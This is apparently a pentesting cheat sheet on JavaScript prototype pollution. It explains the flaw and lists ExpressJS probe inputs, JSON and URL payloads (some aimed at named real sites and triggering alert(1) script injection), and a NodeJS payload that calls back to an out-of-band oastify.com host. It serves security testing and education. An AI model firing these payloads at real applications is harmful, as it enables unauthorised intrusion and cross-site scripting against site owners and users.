Skip to content

Prototype Pollution

Prototype pollution is a type of vulnerability that occurs in JavaScript when properties of Object.prototype are modified. This is particularly risky because JavaScript objects are dynamic and we can add properties to them at any time. Also, almost all objects in JavaScript inherit from Object.prototype, making it a potential attack vector.

Summary

Tools

Labs

Exploit

In JavaScript, prototypes are what allow objects to inherit features from other objects. If an attacker is able to add or modify properties of Object.prototype, they can essentially affect all objects that inherit from that prototype, potentially leading to various kinds of security risks.

var myDog = new Dog();

// Points to the function "Dog"
myDog.constructor;

// Points to the class definition of "Dog"
myDog.constructor.prototype;
myDog.__proto__;
myDog["__proto__"];

Examples

  • Imagine that an application uses an object to maintain configuration settings, like this:
    let config = {
        isAdmin: false
    };
    
  • An attacker might be able to add an isAdmin property to Object.prototype, like this:
    Object.prototype.isAdmin = true;
    

Manual Testing

  • ExpressJS: { "__proto__":{"parameterLimit":1}} + 2 parameters in GET request, at least 1 must be reflected in the response.
  • ExpressJS: { "__proto__":{"ignoreQueryPrefix":true}} + ??foo=bar
  • ExpressJS: { "__proto__":{"allowDots":true}} + ?foo.bar=baz
  • Change the padding of a JSON response: { "__proto__":{"json spaces":" "}} + {"foo":"bar"}, the server should return {"foo": "bar"}
  • Modify CORS header responses: { "__proto__":{"exposedHeaders":["foo"]}}, the server should return the header Access-Control-Expose-Headers.
  • Change the status code: { "__proto__":{"status":510}}

Prototype Pollution via JSON input

You can access the prototype of any object via the magic property __proto__. The JSON.parse() function in JavaScript is used to parse a JSON string and convert it into a JavaScript object. Typically it is a sink function where prototype pollution can happen.

{
    "__proto__": {
        "evilProperty": "evilPayload"
    }
}

Asynchronous payload for NodeJS.

{
  "__proto__": {
    "argv0":"node",
    "shell":"node",
    "NODE_OPTIONS":"--inspect=payload\"\".oastify\"\".com"
  }
}

Polluting the prototype via the constructor property instead.

{
    "constructor": {
        "prototype": {
            "foo": "bar",
            "json spaces": 10
        }
    }
}

Prototype Pollution in URL

Example of Prototype Pollution payloads found in the wild.

https://victim.com/#a=b&__proto__[admin]=1
https://example.com/#__proto__[xxx]=alert(1)
http://server/servicedesk/customer/user/signup?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
https://www.apple.com/shop/buy-watch/apple-watch?__proto__[src]=image&__proto__[onerror]=alert(1)
https://www.apple.com/shop/buy-watch/apple-watch?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)

Prototype Pollution Exploitation

Depending if the prototype pollution is executed client (CSPP) or server side (SSPP), the impact will vary.

Prototype Pollution Payloads

Object.__proto__["evilProperty"]="evilPayload"
Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"__proto__": {"evilProperty": "evilPayload"}}
{"__proto__.name":"test"}
x[__proto__][abaeead] = abaeead
x.__proto__.edcbcab = edcbcab
__proto__[eedffcb] = eedffcb
__proto__.baaebfc = baaebfc
?__proto__[test]=test

Prototype Pollution Gadgets

A "gadget" in the context of vulnerabilities typically refers to a piece of code or functionality that can be exploited or leveraged during an attack. When we talk about a "prototype pollution gadget," we're referring to a specific code path, function, or feature of an application that is susceptible to or can be exploited through a prototype pollution attack.

Either create your own gadget using part of the source with yeswehack/pp-finder, or try to use already discovered gadgets yuske/server-side-prototype-pollution / BlackFan/client-side-prototype-pollution.

References